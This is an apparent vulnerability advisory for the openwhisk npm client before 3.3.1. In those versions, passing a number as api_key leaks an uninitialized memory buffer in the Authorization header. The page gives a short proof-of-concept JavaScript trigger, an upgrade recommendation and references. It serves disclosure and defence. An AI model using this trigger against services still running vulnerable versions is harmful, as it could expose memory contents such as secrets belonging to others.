GMS-2020-756: Remote Memory Exposure in openwhisk

September 1, 2020 (updated September 24, 2021)

Versions of openwhisk before 3.3.1 are vulnerable to remote memory exposure.

When a number is passed to api_key, affected versions of openwhisk allocate an uninitialized buffer and send that over network in Authorization header (base64-encoded).

Proof of concept:

var openwhisk = require('openwhisk');
var options = {
  apihost: '127.0.0.1:1433', 
  api_key: USERSUPPLIEDINPUT // number
};
var ow = openwhisk(options);
ow.actions.invoke({actionName: 'sample'}).then(result => console.log(result))

Recommendation

Update to version 3.3.1 or later.

References

github.com/advisories/GHSA-53mj-mc38-q894
github.com/openwhisk/openwhisk-client-js/pull/34
www.npmjs.com/advisories/600

Detect and mitigate GMS-2020-756 with GitLab Dependency Scanning

Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →